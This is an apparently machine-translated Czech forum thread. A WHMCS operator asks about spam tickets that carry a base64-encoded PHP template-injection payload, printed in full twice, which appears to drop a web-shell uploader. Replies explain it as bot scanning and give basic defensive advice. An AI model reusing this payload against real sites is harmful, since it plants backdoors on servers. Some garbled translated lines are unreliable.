Mám WHMCS a bez problémů ho používám pro účely hostování.

Téměř každé 2 nebo 3 dny vidím spam se škodlivým obsahem odeslaný jako nový lístek, který se pokouší hacknout.

Poslední byl:

Předmět:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php}) 

Zpráva:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php}) 

Jaké jsou tyto útoky? Proč nepoužijí jiný způsob útoku? !!!

Podle mého názoru je zřejmé, že systém jako WHMCS nikdy nebude hacknut tak špatnými pokusy. Měli samozřejmě používat některé funkce jako strip_tags a mysql_real_escape_string a další bezpečnostní funkce.

Vysvětlil by některý orgán, proč vždy volí tak špatný způsob útoku? Opravdu nevědí, že WHMCS je silnější než tyto hackery na nízké úrovni?

Ve skutečnosti bych rád věděl, že: Liší se tyto snahy navzájem? Mohou to myslet vážně? Měl bych se těchto pokusů bát?

Je to robot, který prohledává web kvůli instalacím WHMCS, které jsou vůči tomuto útoku zranitelné, je to jen nedílná součást provozu webu.

  • Děkuji za váš komentář. Ale povolil jsem captcha. Jak to mohou předat ?!
  • Takže jak si myslíte, že se nemusíte obávat vůbec? Že jo?
  • 1 Většina capcha byla již mnohokrát prolomena, vše, co capcha dělá, je likvidace vážných útočníků od těch vážných, pokud budete stále chytat e-maily, mělo by to být v pořádku - sledovali jste IP ve svých protokolech? .
  • Děkujeme za váš návrh. já vždy Block Sender And Delete ten lístek.

Pokud jste zvědaví, zde je zdroj (nebo jeho kopie) metody útočníka: http://pastebin.com/yCW9vWzZ To může také pomoci: http://www.wjunction.com/10-hosting- diskuse / 116021-boxslots-hacked-again-5.htm

Co se týče obav? Pokud jste si jisti, že dodržujete ortodoxní bezpečnostní protokoly serveru a aktivně kontrolujete a opravujete jakékoli díry, měli byste být v pořádku. Doporučuji vést protokol všech adres IP odesílajících tento kód a poté zavolat jejich ISP (lze zjistit z adresy http://ip2location.com/their.ip.address.here).

Pracoval pro vás: Charles Robertson | Chcete nás kontaktovat?

užitečné informace